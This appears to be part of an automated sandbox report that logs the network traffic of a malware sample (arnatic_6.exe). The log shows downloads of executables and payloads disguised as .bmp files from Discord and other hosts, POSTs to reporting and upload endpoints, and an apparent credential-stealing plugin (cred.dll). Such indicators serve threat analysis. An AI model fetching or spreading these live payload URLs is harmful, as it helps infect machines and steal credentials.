                                                                                                                                                                                        403
                                                                                                                                                                                      • 162.159.135.233:80
                                                                                                                                                                                        cdn.discordapp.com
                                                                                                                                                                                        tls
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        409 B
                                                                                                                                                                                        488 B
                                                                                                                                                                                        5
                                                                                                                                                                                        4
                                                                                                                                                                                      • 104.21.65.45:80
                                                                                                                                                                                        jom.diregame.live
                                                                                                                                                                                        tls
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        360 B
                                                                                                                                                                                        488 B
                                                                                                                                                                                        5
                                                                                                                                                                                        4
                                                                                                                                                                                      • 162.159.135.233:80
                                                                                                                                                                                        cdn.discordapp.com
                                                                                                                                                                                        tls
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        409 B
                                                                                                                                                                                        488 B
                                                                                                                                                                                        5
                                                                                                                                                                                        4
                                                                                                                                                                                      • 172.67.155.53:443
                                                                                                                                                                                        https://fackerty.info/app.exe
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        1.0kB
                                                                                                                                                                                        4.9kB
                                                                                                                                                                                        11
                                                                                                                                                                                        10

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        HEAD https://fackerty.info/app.exe

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 162.159.135.233:80
                                                                                                                                                                                        cdn.discordapp.com
                                                                                                                                                                                        tls
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        409 B
                                                                                                                                                                                        488 B
                                                                                                                                                                                        5
                                                                                                                                                                                        4
                                                                                                                                                                                      • 162.159.135.233:80
                                                                                                                                                                                        cdn.discordapp.com
                                                                                                                                                                                        tls
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        409 B
                                                                                                                                                                                        488 B
                                                                                                                                                                                        5
                                                                                                                                                                                        4
                                                                                                                                                                                      • 104.21.65.45:80
                                                                                                                                                                                        jom.diregame.live
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        144 B
                                                                                                                                                                                        132 B
                                                                                                                                                                                        3
                                                                                                                                                                                        3
                                                                                                                                                                                      • 104.21.65.45:443
                                                                                                                                                                                        https://jom.diregame.live/userf/2201/google-game.exe
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        18.1kB
                                                                                                                                                                                        20
                                                                                                                                                                                        19

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://jom.diregame.live/userf/2201/google-game.exe

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 162.159.135.233:80
                                                                                                                                                                                        cdn.discordapp.com
                                                                                                                                                                                        tls
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        361 B
                                                                                                                                                                                        488 B
                                                                                                                                                                                        5
                                                                                                                                                                                        4
                                                                                                                                                                                      • 162.159.135.233:80
                                                                                                                                                                                        cdn.discordapp.com
                                                                                                                                                                                        tls
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        361 B
                                                                                                                                                                                        488 B
                                                                                                                                                                                        5
                                                                                                                                                                                        4
                                                                                                                                                                                      • 162.159.135.233:80
                                                                                                                                                                                        cdn.discordapp.com
                                                                                                                                                                                        tls
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        315 B
                                                                                                                                                                                        92 B
                                                                                                                                                                                        4
                                                                                                                                                                                        2
                                                                                                                                                                                      • 162.159.135.233:80
                                                                                                                                                                                        cdn.discordapp.com
                                                                                                                                                                                        tls
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        361 B
                                                                                                                                                                                        488 B
                                                                                                                                                                                        5
                                                                                                                                                                                        4
                                                                                                                                                                                      • 89.221.213.3:80
                                                                                                                                                                                        http://www.quickfastfuriousloaded.com/campaign1/SunLabsPlayer.exe
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        513 B
                                                                                                                                                                                        172 B
                                                                                                                                                                                        6
                                                                                                                                                                                        4

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://www.quickfastfuriousloaded.com/campaign1/SunLabsPlayer.exe
                                                                                                                                                                                      • 185.20.227.194:80
                                                                                                                                                                                        http://185.20.227.194/install.exe
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        481 B
                                                                                                                                                                                        172 B
                                                                                                                                                                                        6
                                                                                                                                                                                        4

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://185.20.227.194/install.exe
                                                                                                                                                                                      • 162.159.135.233:80
                                                                                                                                                                                        cdn.discordapp.com
                                                                                                                                                                                        tls
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        361 B
                                                                                                                                                                                        488 B
                                                                                                                                                                                        5
                                                                                                                                                                                        4
                                                                                                                                                                                      • 172.67.155.53:443
                                                                                                                                                                                        https://fackerty.info/app.exe
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        1.5kB
                                                                                                                                                                                        15.4kB
                                                                                                                                                                                        19
                                                                                                                                                                                        18

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://fackerty.info/app.exe

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 162.159.135.233:80
                                                                                                                                                                                        cdn.discordapp.com
                                                                                                                                                                                        tls
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        361 B
                                                                                                                                                                                        488 B
                                                                                                                                                                                        5
                                                                                                                                                                                        4
                                                                                                                                                                                      • 162.159.135.233:80
                                                                                                                                                                                        cdn.discordapp.com
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        144 B
                                                                                                                                                                                        132 B
                                                                                                                                                                                        3
                                                                                                                                                                                        3
                                                                                                                                                                                      • 162.159.135.233:80
                                                                                                                                                                                        cdn.discordapp.com
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        144 B
                                                                                                                                                                                        132 B
                                                                                                                                                                                        3
                                                                                                                                                                                        3
                                                                                                                                                                                      • 162.159.135.233:443
                                                                                                                                                                                        https://cdn.discordapp.com/attachments/855697945679888404/860411180802899998/file2.bmp
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        28.5kB
                                                                                                                                                                                        662.6kB
                                                                                                                                                                                        607
                                                                                                                                                                                        606

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://cdn.discordapp.com/attachments/855697945679888404/860411180802899998/file2.bmp

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 162.159.135.233:80
                                                                                                                                                                                        cdn.discordapp.com
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        144 B
                                                                                                                                                                                        132 B
                                                                                                                                                                                        3
                                                                                                                                                                                        3
                                                                                                                                                                                      • 162.159.135.233:80
                                                                                                                                                                                        cdn.discordapp.com
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        144 B
                                                                                                                                                                                        132 B
                                                                                                                                                                                        3
                                                                                                                                                                                        3
                                                                                                                                                                                      • 162.159.135.233:443
                                                                                                                                                                                        https://cdn.discordapp.com/attachments/855697945679888404/859709260588646410/ChromeExtract.bmp
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        13.4kB
                                                                                                                                                                                        307.3kB
                                                                                                                                                                                        280
                                                                                                                                                                                        279

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://cdn.discordapp.com/attachments/855697945679888404/859709260588646410/ChromeExtract.bmp

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 220.125.1.129:80
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        http
                                                                                                                                                                                        786 B
                                                                                                                                                                                        465 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://lahuertasonora.com/upload/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        404
                                                                                                                                                                                      • 220.125.1.129:80
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        http
                                                                                                                                                                                        764 B
                                                                                                                                                                                        833 B
                                                                                                                                                                                        6
                                                                                                                                                                                        6

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://lahuertasonora.com/upload/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        404
                                                                                                                                                                                      • 220.125.1.129:80
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        http
                                                                                                                                                                                        825 B
                                                                                                                                                                                        793 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://lahuertasonora.com/upload/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        404
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 220.125.1.129:80
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        http
                                                                                                                                                                                        849 B
                                                                                                                                                                                        793 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://lahuertasonora.com/upload/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        404
                                                                                                                                                                                      • 220.125.1.129:80
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        http
                                                                                                                                                                                        745 B
                                                                                                                                                                                        793 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://lahuertasonora.com/upload/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        404
                                                                                                                                                                                      • 220.125.1.129:80
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        http
                                                                                                                                                                                        680 B
                                                                                                                                                                                        514 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://lahuertasonora.com/upload/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        404
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 162.159.135.233:443
                                                                                                                                                                                        https://cdn.discordapp.com/attachments/855697945679888404/860411175945895936/file3.bmp
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        12.6kB
                                                                                                                                                                                        293.1kB
                                                                                                                                                                                        257
                                                                                                                                                                                        256

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://cdn.discordapp.com/attachments/855697945679888404/860411175945895936/file3.bmp

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 152.89.247.174:80
                                                                                                                                                                                        http://152.89.247.174/blog/files/notepad.exe
                                                                                                                                                                                        http
                                                                                                                                                                                        15.0kB
                                                                                                                                                                                        750.7kB
                                                                                                                                                                                        323
                                                                                                                                                                                        622

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://152.89.247.174/blog/files/notepad.exe

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 136.144.41.201:80
                                                                                                                                                                                        http://136.144.41.201/WW/file3.exe
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        43.3kB
                                                                                                                                                                                        1.1MB
                                                                                                                                                                                        933
                                                                                                                                                                                        932

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://136.144.41.201/WW/file6.exe

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://136.144.41.201/WW/file3.exe

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 88.99.66.31:443
                                                                                                                                                                                        https://iplogger.com/1Fn797
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        f63HbxfV2WYcYU58wgLyTehf.exe
                                                                                                                                                                                        1.3kB
                                                                                                                                                                                        5.6kB
                                                                                                                                                                                        15
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://iplogger.com/1Fb797

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://iplogger.com/1Fn797

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 216.58.208.109:443
                                                                                                                                                                                        accounts.google.com
                                                                                                                                                                                        tls
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        1.9kB
                                                                                                                                                                                        5.4kB
                                                                                                                                                                                        19
                                                                                                                                                                                        19
                                                                                                                                                                                      • 172.217.20.78:443
                                                                                                                                                                                        clients2.google.com
                                                                                                                                                                                        tls
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        3.5kB
                                                                                                                                                                                        12.6kB
                                                                                                                                                                                        26
                                                                                                                                                                                        31
                                                                                                                                                                                      • 172.67.195.177:443
                                                                                                                                                                                        ezsearch.ru
                                                                                                                                                                                        tls
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        3.7kB
                                                                                                                                                                                        14
                                                                                                                                                                                        15
                                                                                                                                                                                      • 172.67.195.177:443
                                                                                                                                                                                        ezsearch.ru
                                                                                                                                                                                        tls
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        48.5kB
                                                                                                                                                                                        105.3kB
                                                                                                                                                                                        107
                                                                                                                                                                                        146
                                                                                                                                                                                      • 8.8.4.4:443
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        tls
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        701 B
                                                                                                                                                                                        172 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4
                                                                                                                                                                                      • 8.8.4.4:443
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        tls
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        701 B
                                                                                                                                                                                        172 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4
                                                                                                                                                                                      • 8.8.4.4:443
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        tls
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        701 B
                                                                                                                                                                                        172 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4
                                                                                                                                                                                      • 8.8.4.4:443
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        tls
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        701 B
                                                                                                                                                                                        172 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4
                                                                                                                                                                                      • 8.8.4.4:443
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        tls
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        701 B
                                                                                                                                                                                        172 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4
                                                                                                                                                                                      • 8.8.4.4:443
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        tls
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        701 B
                                                                                                                                                                                        172 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4
                                                                                                                                                                                      • 220.125.1.129:80
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        http
                                                                                                                                                                                        840 B
                                                                                                                                                                                        793 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://lahuertasonora.com/upload/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        404
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/plugins/cred.dll
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        666 B
                                                                                                                                                                                        485 B
                                                                                                                                                                                        8
                                                                                                                                                                                        8

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://185.215.113.55/t5BnOoke2/plugins/cred.dll
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/plugins/cred.dll
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        82.1kB
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        65
                                                                                                                                                                                        26

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php?scr=1

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://185.215.113.55/t5BnOoke2/plugins/cred.dll
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.3kB
                                                                                                                                                                                        13.9kB
                                                                                                                                                                                        15
                                                                                                                                                                                        14

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 8.8.4.4:443
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        tls
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        701 B
                                                                                                                                                                                        172 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4
                                                                                                                                                                                      • 8.8.4.4:443
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        tls
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        701 B
                                                                                                                                                                                        172 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4
                                                                                                                                                                                      • 8.8.4.4:443
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        tls
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        701 B
                                                                                                                                                                                        172 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4
                                                                                                                                                                                      • 162.159.135.233:80
                                                                                                                                                                                        cdn.discordapp.com
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        144 B
                                                                                                                                                                                        132 B
                                                                                                                                                                                        3
                                                                                                                                                                                        3
                                                                                                                                                                                      • 162.159.135.233:443
                                                                                                                                                                                        https://cdn.discordapp.com/attachments/855697945679888404/859836642079932456/file1.bmp
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        26.3kB
                                                                                                                                                                                        674.3kB
                                                                                                                                                                                        555
                                                                                                                                                                                        554

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://cdn.discordapp.com/attachments/855697945679888404/859836642079932456/file1.bmp

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 35.190.80.1:443
                                                                                                                                                                                        a.nel.cloudflare.com
                                                                                                                                                                                        tls
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        4.8kB
                                                                                                                                                                                        7.1kB
                                                                                                                                                                                        31
                                                                                                                                                                                        36
                                                                                                                                                                                      • 142.250.179.161:443
                                                                                                                                                                                        clients2.googleusercontent.com
                                                                                                                                                                                        tls
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        25.1kB
                                                                                                                                                                                        1.1MB
                                                                                                                                                                                        483
                                                                                                                                                                                        924
                                                                                                                                                                                      • 8.8.4.4:443
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        tls
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        3.6kB
                                                                                                                                                                                        11.6kB
                                                                                                                                                                                        30
                                                                                                                                                                                        34
                                                                                                                                                                                      • 8.8.4.4:443
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        tls
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        2.7kB
                                                                                                                                                                                        9.9kB
                                                                                                                                                                                        23
                                                                                                                                                                                        25
                                                                                                                                                                                      • 8.8.4.4:443
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        tls
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        5.6kB
                                                                                                                                                                                        16.8kB
                                                                                                                                                                                        43
                                                                                                                                                                                        51
                                                                                                                                                                                      • 220.125.1.129:80
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        http
                                                                                                                                                                                        824 B
                                                                                                                                                                                        793 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://lahuertasonora.com/upload/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        404
                                                                                                                                                                                      • 142.251.36.3:443
                                                                                                                                                                                        ssl.gstatic.com
                                                                                                                                                                                        tls
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        1.6kB
                                                                                                                                                                                        3.2kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13
                                                                                                                                                                                      • 159.65.63.164:80
                                                                                                                                                                                        http://g-partners.top/decision.php?pub=mixinte
                                                                                                                                                                                        http
                                                                                                                                                                                        2aNJWnHICffmGqno89GuHbVV.exe
                                                                                                                                                                                        354 B
                                                                                                                                                                                        432 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://g-partners.top/decision.php?pub=mixinte

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 8.8.4.4:443
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        tls
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        701 B
                                                                                                                                                                                        172 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4
                                                                                                                                                                                      • 8.8.4.4:443
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        tls
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        701 B
                                                                                                                                                                                        172 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4
                                                                                                                                                                                      • 8.8.4.4:443
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        tls
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        701 B
                                                                                                                                                                                        172 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4
                                                                                                                                                                                      • 104.16.168.131:443
                                                                                                                                                                                        hcaptcha.com
                                                                                                                                                                                        tls
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        6.1kB
                                                                                                                                                                                        142.5kB
                                                                                                                                                                                        87
                                                                                                                                                                                        150
                                                                                                                                                                                      • 176.99.131.168:80
                                                                                                                                                                                        http://usa01.info/app/files/ap/id27315003.php
                                                                                                                                                                                        http
                                                                                                                                                                                        f63HbxfV2WYcYU58wgLyTehf.exe
                                                                                                                                                                                        31.6kB
                                                                                                                                                                                        763.7kB
                                                                                                                                                                                        677
                                                                                                                                                                                        675

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://usa01.info/users/content/id03084901/mmow.txt

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        301

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://usa01.info/function/v2tmp/momomoomomom.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://usa01.info/books/userpaths/birbik/harrypotter3.txt

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        301

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://usa01.info/app/files/ap/id27315003.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 220.125.1.129:80
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        http
                                                                                                                                                                                        660 B
                                                                                                                                                                                        793 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://lahuertasonora.com/upload/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        404
                                                                                                                                                                                      • 159.65.63.164:80
                                                                                                                                                                                        http://g-partners.top/stats/remember.php?pub=mixinte&user=Admin
                                                                                                                                                                                        http
                                                                                                                                                                                        2aNJWnHICffmGqno89GuHbVV.exe
                                                                                                                                                                                        371 B
                                                                                                                                                                                        432 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://g-partners.top/stats/remember.php?pub=mixinte&user=Admin

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 220.125.1.129:80
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        http
                                                                                                                                                                                        740 B
                                                                                                                                                                                        793 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://lahuertasonora.com/upload/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        404
                                                                                                                                                                                      • 185.183.98.8:80
                                                                                                                                                                                        http://rdanoriran.xyz/
                                                                                                                                                                                        http
                                                                                                                                                                                        rwI3a3wTWh88dBrQa1ud4qdg.exe
                                                                                                                                                                                        948 B
                                                                                                                                                                                        1.6kB
                                                                                                                                                                                        8
                                                                                                                                                                                        8

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://rdanoriran.xyz/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://rdanoriran.xyz/
                                                                                                                                                                                      • 159.65.63.164:80
                                                                                                                                                                                        http://g-partners.top/dlc/distribution.php?pub=mixinte
                                                                                                                                                                                        http
                                                                                                                                                                                        2aNJWnHICffmGqno89GuHbVV.exe
                                                                                                                                                                                        23.4kB
                                                                                                                                                                                        568.7kB
                                                                                                                                                                                        499
                                                                                                                                                                                        498

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://g-partners.top/dlc/distribution.php?pub=mixinte

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.3kB
                                                                                                                                                                                        13.9kB
                                                                                                                                                                                        16
                                                                                                                                                                                        15

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 220.125.1.129:80
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        http
                                                                                                                                                                                        745 B
                                                                                                                                                                                        212 B
                                                                                                                                                                                        7
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://lahuertasonora.com/upload/
                                                                                                                                                                                      • 104.26.13.31:443
                                                                                                                                                                                        https://api.ip.sb/geoip
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        rwI3a3wTWh88dBrQa1ud4qdg.exe
                                                                                                                                                                                        891 B
                                                                                                                                                                                        16.7kB
                                                                                                                                                                                        12
                                                                                                                                                                                        18

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://api.ip.sb/geoip

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 162.159.135.233:443
                                                                                                                                                                                        https://cdn.discordapp.com/attachments/849802777433341954/849807598056112138/Setup2.exe
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        98.7kB
                                                                                                                                                                                        2.5MB
                                                                                                                                                                                        2129
                                                                                                                                                                                        2127

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://cdn.discordapp.com/attachments/849802777433341954/849807598056112138/Setup2.exe

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 162.159.135.233:443
